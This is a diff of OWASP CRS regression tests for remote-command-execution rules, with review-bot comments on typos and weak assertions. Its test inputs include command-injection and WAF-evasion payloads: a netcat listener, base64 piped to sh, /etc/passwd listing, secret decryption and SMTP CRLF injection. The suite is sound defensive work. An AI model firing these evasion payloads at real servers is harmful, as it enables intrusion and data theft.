@@ -456,7 +482,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 28 desc: "Block execution of perf command with arguments" stages:
@@ -471,7 +498,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 29 desc: "Block execution of perf command with arguments" stages:
@@ -487,7 +515,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 30 desc: "Block evasion using here string" stages:
@@ -502,7 +531,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 31 desc: "Block evasion using here string with space" stages:
@@ -517,7 +547,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 32 desc: "Block evasion using here string with single quotes" stages:
@@ -532,7 +563,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 33 desc: "Block evasion using here string with double quotes" stages:
@@ -547,7 +579,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 34 desc: "Block evasion using here string with command substitution" stages:
@@ -562,7 +595,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 35 desc: "Block `time` prefix" stages:
@@ -577,7 +611,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 36 desc: "Block `strace` prefix" stages: @@ -592,7 +627,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 37 desc: "Block `nohup` prefix" stages: @@ -607,7 +643,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 38 desc: "Block ad-hoc ansible commands" stages: @@ -622,7 +659,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 39 desc: "Block ansible config dump command" stages: @@ -637,7 +675,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 40 desc: "Block installing collections from ansible galaxy" stages: @@ -652,7 +691,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 41 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -667,7 +707,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 42 desc: "Block ansible-doc command" stages: @@ -682,7 +723,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 43 desc: "Block dumping ansible inventory file and variables" stages: @@ -697,7 +739,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 44 desc: "Block ansible pull from remote repository" stages: @@ -712,7 +755,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 45 desc: "Block decrypting ansible secrets" stages: 
@@ -727,7 +771,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 46 desc: "Block execution of ansible playbooks" stages: @@ -742,7 +787,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 47 desc: "Block decryption of secrets with chef-vault" stages: @@ -757,7 +803,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 48 desc: "Block execution of chef-shell command" stages: @@ -772,7 +819,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 49 desc: "Block execution chef recipie book" stages: @@ -787,7 +835,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 50 desc: "Block execution chef recipie book against a specific node" stages: @@ -802,7 +851,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 51 desc: "Block execution chef command" stages: @@ -817,7 +867,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 52 desc: "Block execution of visudo" stages: @@ -832,7 +883,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 53 desc: "Block execution of CrowdSec cscli" stages: @@ -847,4 +899,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml index 911e82852..bef2ffde4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml 
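Review bot: Tests 49 and 50 (hunks @@ -757,7 +803,8 and @@ -772,7 +819,8) are described as `Block execution chef recipie book`; the word is 'recipe', and the same misspelling recurs in the 932260 file further down this diff (tests 41 and 42). Since the `desc` is what the runner prints for a failing test, fix both files in one pass, e.g. `desc: "Block execution of chef recipe"` and `desc: "Block execution of chef recipe against a specific node"`.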
@@ -20,7 +20,8 @@ tests: cmd=garb=adduse[r];$garb pizza version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 2 desc: 'globbing technique 2: {n$u\c$u,-nlvp,777} (BB X)' stages: @@ -37,7 +38,8 @@ tests: cmd={n$u\c$u,-nlvp,777} version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 3 desc: 'globbing technique 3: una$$me -a in cookies (BB S01X1GRV)' stages: @@ -53,7 +55,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 4 desc: 'globbing technique 4: uname$u -a (BB S01X1GRV)' stages: @@ -69,7 +72,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 5 desc: 'vars + spacing: v="u";cu$v\\r\l google.com (BB X)' stages: @@ -86,7 +90,8 @@ tests: cmd=v='u';cu$v\\r\l google.com version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 6 desc: 'vars + spacing: non-existing vars: cu$@rl (BB X)' stages: @@ -103,7 +108,8 @@ tests: cmd=cu$@rl google.com version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 7 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an:1'000'000" stages: @@ -122,7 +128,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 8 desc: "Negative test on WordPress like args" stages: @@ -141,7 +148,8 @@ tests: data%5Bwp-refresh-post-lock%5D%5Block%5D=1667487208%3A1&data%5Bwp-refresh-post-lock%5D%5Bpost_id%5D=1&interval=60&_nonce=25ed3b910d&action=heartbeat&screen_id=post&has_focus=false version: HTTP/1.1 output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 9 desc: "Unix Command Injection - python version bypass test" stages: 
@@ -157,7 +165,8 @@ tests: uri: '/get?cmd=""p""y""t""h""o""n""3"".""1""0""%20""c""m""d""' version: HTTP/1.0 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 10 desc: Backticks command subtition WAF evasion stages: @@ -172,7 +181,8 @@ tests: uri: "/get?x=ping``%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 11 desc: Backticks command subtition WAF evasion (mid command) stages: @@ -187,7 +197,8 @@ tests: uri: "/get?x=pi``ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 12 desc: Dollar sign command subtition WAF evasion stages: @@ -202,7 +213,8 @@ tests: uri: "/get?x=ping$()%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 13 desc: Dollar sign command subtition WAF evasion (mid command) stages: @@ -217,7 +229,8 @@ tests: uri: "/get?x=pi$()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 14 desc: Process subtition '<()' WAF evasion (mid command) stages: @@ -232,7 +245,8 @@ tests: uri: "/get?x=pi<()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 15 desc: Process subtition '>()' WAF evasion (mid command) stages: @@ -247,7 +261,8 @@ tests: uri: "/get?x=pi>()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 16 desc: FP against single quote inside string stages: @@ -264,7 +279,8 @@ tests: payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. version: "HTTP/1.1" output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: 
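Review bot: Tests 10 through 15 (hunks @@ -157,7 +165,8 through @@ -232,7 +245,8) all spell 'substitution' as `subtition` in their desc, e.g. `desc: Backticks command subtition WAF evasion`. The desc is the only human-readable label the runner prints on failure, so the typo is worth correcting across all six while their output blocks are being rewritten anyway: `desc: Backticks command substitution WAF evasion`, `desc: Dollar sign command substitution WAF evasion`, `desc: Process substitution '<()' WAF evasion (mid command)`, and the matching '(mid command)' and '>()' variants.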
@@ -281,7 +297,8 @@ tests: payload=kill '-'9 version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: @@ -298,7 +315,8 @@ tests: payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. version: "HTTP/1.1" output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 19 desc: "Detect quote evasion: py''thon" stages: @@ -315,4 +333,5 @@ tests: payload=py''thon -c "print('attack')" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index ccb8dfd65..70d0cd95e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -21,7 +21,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 2 stages: - input: 
@@ -36,23 +37,24 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932250" - # FIXME: 932150 already had this false positive. Fix after rework - # - test_id: 3 - # stages: - # - input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" + log: + no_expect_ids: [932250] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] - test_id: 4 desc: Negative test for excluded command `c99` stages: @@ -68,7 +70,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: @@ -84,7 +87,8 @@ tests: uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" version: HTTP/1.0 output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: @@ -99,7 +103,8 @@ tests: uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 7 desc: "'ls' direct command injection" stages: 
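Review bot: Test 3 (hunk @@ -36,23 +37,24) is re-enabled by deleting the comment block that carried `FIXME: 932150 already had this false positive. Fix after rework`, but nothing in the hunk shows that the false positive on `foo=tar is a dark brown or black bituminous usually odorous viscous liquid` has been resolved; every other change in the diff is a mechanical assertion rewrite. If 932250 still matches `tar` as a bare word this negative test starts failing, and if the rework that fixed it has landed, the re-enable should be stated explicitly rather than arrive as a side effect of the format migration. Consider also giving the test a `desc:` like the later tests in this file, e.g. `desc: "Negative test: 'tar' as a plain English word"`.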
@@ -114,7 +119,8 @@ tests: uri: "/get?x=ls%20-l%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: @@ -129,7 +135,8 @@ tests: uri: "/get?x=ls%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: @@ -144,7 +151,8 @@ tests: uri: "/get?x=ls%20foo%20bar" version: "HTTP/1.1" output: - log_contains: id "932250" + log: + expect_ids: [932250] - test_id: 10 desc: "'ls' direct command injection FP test" stages: @@ -159,7 +167,8 @@ tests: uri: "/get?x=kills%20foo%20bar" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 11 desc: "FP for 'sh' without word boundary" stages: @@ -174,7 +183,8 @@ tests: uri: "/get?show_comments_cookies_opt_in=true" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 12 desc: "FP for 'ls' without word boundary in cookie header value" stages: @@ -190,7 +200,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: @@ -206,4 +217,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 600f3e6de..16c017ce0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 2 stages: - input: 
@@ -32,7 +33,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 5 stages: - input: @@ -77,7 +81,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 6 stages: - input: @@ -92,7 +97,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?cmd=python3.10%20cmd" version: HTTP/1.0 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 8 desc: "Unix Command Injection - printf bypass test" stages: @@ -124,7 +131,8 @@ tests: uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" version: HTTP/1.0 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: @@ -140,7 +148,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: @@ -156,7 +165,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: @@ -172,7 +182,8 @@ tests: uri: "/get?code=busybox%20-c%20%22echo%20hi%22" version: "HTTP/1.1" output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 12 desc: Remote Command Execution bypass with time stages: 
@@ -189,7 +200,8 @@ tests: uri: "/get?foo=time+bsdtar+" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: @@ -206,7 +218,8 @@ tests: uri: "/get?foo=time+warner+" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: @@ -223,7 +236,8 @@ tests: uri: "/get?foo=time+curl+coreruleset.org" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: @@ -240,7 +254,8 @@ tests: uri: "/get?foo=ti''me+curl+coreruleset.org" version: HTTP/1.1 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: @@ -257,7 +272,8 @@ tests: uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 17 desc: "'find' direct command injection FP test" stages: @@ -272,7 +288,8 @@ tests: uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 18 desc: "'find' direct command injection FP test" stages: @@ -287,7 +304,8 @@ tests: uri: "/get?x=find%20x%20for%20y" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 19 desc: "'ping' direct command injection FP test" stages: @@ -302,7 +320,8 @@ tests: uri: "/get?x=ping%20127.0.0.1" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 20 desc: "FP for 'head of'" stages: 
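Review bot: Tests 14, 15, 17 and 19 (hunks @@ -223,7 +236,8, @@ -240,7 +254,8, @@ -272,7 +288,8 and @@ -302,7 +320,8) send live-looking payloads — `time+curl+coreruleset.org`, `ti''me+curl+coreruleset.org`, `find . 1 -exec curl google.com \;`, `ping 127.0.0.1` — yet assert only `no_expect_ids: [932260]`. That is correct if these are deliberately out of 932260's scope and caught by a sibling rule, but a regression that lets the payload through entirely passes the test just the same, so the negation alone cannot tell the two apart. The new `log:` block can express the intent: add an `expect_ids:` entry for the rule that is supposed to fire next to the `no_expect_ids`, if the runner accepts both keys together, or at minimum say in the `desc` which rule is expected to cover the payload, the way test 13's `negative test` wording marks `time+warner` as a genuine false-positive case.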
@@ -318,7 +337,8 @@ tests: data: "job_title=head%20of" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: @@ -333,7 +353,8 @@ tests: uri: "/get?word=evaluation" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: @@ -348,7 +369,8 @@ tests: uri: "/get?word=schedule" version: "HTTP/1.1" output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: @@ -363,7 +385,8 @@ tests: uri: "/get?args=comment" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: @@ -378,7 +401,8 @@ tests: uri: "/get?last_name=Perlak" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 25 desc: "FP against word 'Axel'" stages: @@ -393,7 +417,8 @@ tests: uri: "/get?first_name=Axel" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 26 desc: "FP with word performance" stages: @@ -408,7 +433,8 @@ tests: uri: "/get?args=performance" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 27 desc: "Block execution of perf command with arguments" stages: @@ -424,7 +450,8 @@ tests: data: "args=perf --version" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 28 desc: | Match despite quote evasion attempt. @@ -442,7 +469,8 @@ tests: uri: "/get?a=whoami;0'0'\"" version: HTTP/1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 29 desc: "FP against word 'Cronk'" stages: 
@@ -457,7 +485,8 @@ tests: uri: "/get?last_name=Cronk" version: HTTP/1.0 output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] - test_id: 30 desc: "Block ad-hoc ansible commands" stages: @@ -474,7 +503,8 @@ tests: data: | code=ansible all -m ping output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 31 desc: "Block ansible config dump command" stages: @@ -491,7 +521,8 @@ tests: data: | code=ansible-config dump output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: @@ -508,7 +539,8 @@ tests: data: | code=ansible-galaxy collection install community.general output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 33 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -525,7 +557,8 @@ tests: data: | code=ansible-console output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 34 desc: "Block ansible-doc command" stages: @@ -542,7 +575,8 @@ tests: data: | code=ansible-doc plugin ping output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: @@ -559,7 +593,8 @@ tests: data: | code=ansible-inventory --list output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 36 desc: "Block ansible pull from remote repository" stages: @@ -576,7 +611,8 @@ tests: data: | code=ansible-pull --url example.com output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 37 desc: "Block decrypting ansible secrets" stages: @@ -593,7 +629,8 @@ tests: data: | code=ansible-vault decrypt secret output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 38 desc: "Block execution of ansible playbooks" stages: 
@@ -610,7 +647,8 @@ tests: data: | code=ansible-playbook site.yml output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: @@ -627,7 +665,8 @@ tests: data: | code=chef-vault -i secret output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 40 desc: "Block execution of chef-shell command" stages: @@ -644,7 +683,8 @@ tests: data: | code=chef-shell output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 41 desc: "Block execution chef recipie book" stages: @@ -661,7 +701,8 @@ tests: data: | code=chef-run all recipie.rb output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: @@ -678,7 +719,8 @@ tests: data: | code=chef-client -t 1.1.1.1 output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 43 desc: "Block execution of visudo" stages: @@ -695,7 +737,8 @@ tests: data: | code=visudo output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: @@ -712,7 +755,8 @@ tests: data: | code=cscli alerts list output: - log_contains: id "932260" + log: + expect_ids: [932260] - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: @@ -729,4 +773,5 @@ tests: data: | name=Axel Smith output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml index 286396e92..d7c20aa4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml 
@@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=We%20received%20this%20mail%20from%20Mars" version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: @@ -50,7 +52,8 @@ tests: textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: @@ -65,7 +68,8 @@ tests: uri: "/get?attackme=%0d%0aEHLO%20test.com" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: @@ -82,7 +86,8 @@ tests: textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 6 desc: "SMTP RCPT TO Command injection positive test" stages: @@ -97,7 +102,8 @@ tests: uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: @@ -114,7 +120,8 @@ tests: textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: 
@@ -129,7 +136,8 @@ tests: uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" version: HTTP/1.0 output: - log_contains: id "932300" + log: + expect_ids: [932300] - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: @@ -146,4 +154,5 @@ tests: textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel version: HTTP/1.0 output: - no_log_contains: id "932300" + log: + no_expect_ids: [932300] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml index b31ecc86d..ba80b3424 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?test=%0d%0aDATA" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 2 desc: "SMTP DATA Command Injection true negative test" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?text=We%20need%20that%20data%20now" version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: 
